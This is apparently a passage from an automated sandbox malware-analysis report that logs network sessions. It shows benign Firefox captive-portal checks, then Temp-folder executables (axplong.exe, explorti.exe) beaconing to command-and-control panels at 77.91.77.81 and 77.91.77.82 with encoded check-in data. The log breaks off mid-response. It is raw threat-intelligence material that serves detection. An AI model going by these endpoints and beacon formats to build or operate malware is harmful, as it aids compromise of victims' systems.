                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Connection: keep-alive
                                                                                        Pragma: no-cache
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:15:10.764926910 CEST216INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 8
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 10:10:52 GMT
                                                                                        Age: 68658
                                                                                        Content-Type: text/plain
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                        Data Ascii: success
                                                                                        Jul 24, 2024 07:15:10.772114992 CEST305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Connection: keep-alive
                                                                                        Pragma: no-cache
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:15:10.870137930 CEST216INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 8
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 10:10:52 GMT
                                                                                        Age: 68658
                                                                                        Content-Type: text/plain
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                        Data Ascii: success
                                                                                        Jul 24, 2024 07:15:10.895772934 CEST305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Connection: keep-alive
                                                                                        Pragma: no-cache
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:15:10.995227098 CEST216INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 8
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 10:10:52 GMT
                                                                                        Age: 68658
                                                                                        Content-Type: text/plain
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                        Data Ascii: success
                                                                                        Jul 24, 2024 07:15:21.009603977 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:15:31.028614044 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:15:36.930213928 CEST305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Connection: keep-alive
                                                                                        Pragma: no-cache
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:15:37.050709009 CEST216INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 8
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 10:10:52 GMT
                                                                                        Age: 68684
                                                                                        Content-Type: text/plain
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                        Data Ascii: success
                                                                                        Jul 24, 2024 07:15:38.617054939 CEST305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Connection: keep-alive
                                                                                        Pragma: no-cache
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:15:38.727010965 CEST216INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 8
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 10:10:52 GMT
                                                                                        Age: 68686
                                                                                        Content-Type: text/plain
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                        Data Ascii: success
                                                                                        Jul 24, 2024 07:15:48.737083912 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:15:58.752720118 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:08.830073118 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:18.836942911 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:29.332866907 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:39.436508894 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:49.527127028 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:59.538204908 CEST6OUTData Raw: 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.64983334.107.221.82807200C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:10.304872036 CEST303OUTGET /canonical.html HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Connection: keep-alive
                                                                                        Jul 24, 2024 07:15:10.768790007 CEST298INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 90
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 09:32:16 GMT
                                                                                        Age: 70974
                                                                                        Content-Type: text/html
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                        Jul 24, 2024 07:15:10.795017958 CEST303OUTGET /canonical.html HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Connection: keep-alive
                                                                                        Jul 24, 2024 07:15:10.893590927 CEST298INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 90
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 09:32:16 GMT
                                                                                        Age: 70974
                                                                                        Content-Type: text/html
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                        Jul 24, 2024 07:15:20.940572977 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:15:30.947961092 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:15:36.773034096 CEST303OUTGET /canonical.html HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Connection: keep-alive
                                                                                        Jul 24, 2024 07:15:36.892049074 CEST298INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 90
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 09:32:16 GMT
                                                                                        Age: 71000
                                                                                        Content-Type: text/html
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                        Jul 24, 2024 07:15:37.412285089 CEST303OUTGET /canonical.html HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Connection: keep-alive
                                                                                        Jul 24, 2024 07:15:37.511529922 CEST298INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 90
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 09:32:16 GMT
                                                                                        Age: 71001
                                                                                        Content-Type: text/html
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                        Jul 24, 2024 07:15:37.921005011 CEST298INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 90
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 09:32:16 GMT
                                                                                        Age: 71001
                                                                                        Content-Type: text/html
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                        Jul 24, 2024 07:15:47.518019915 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:15:57.535227060 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:07.621836901 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:17.716388941 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:27.735647917 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:37.811259031 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:47.910171032 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:16:58.009274006 CEST6OUTData Raw: 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.64983777.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:11.211806059 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:11.926938057 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:11 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:12.000916958 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:12.455473900 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.64983877.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:12.247112036 CEST179OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 31
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 64 31 3d 31 30 30 30 30 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                        Data Ascii: d1=1000021001&unit=246122658369
                                                                                        Jul 24, 2024 07:15:12.957094908 CEST193INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4 <c>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.64984077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:12.580252886 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:13.299428940 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:13.306596041 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:13.530406952 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.64984177.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:13.086991072 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:13.788285971 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:13.791567087 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:14.016972065 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.64984277.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:13.671524048 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:14.369945049 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:14.380125046 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:14.600703955 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.64984377.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:14.144093037 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:15.765261889 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:15.765959978 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:15.765996933 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:15.766922951 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:15.767685890 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:15.995385885 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
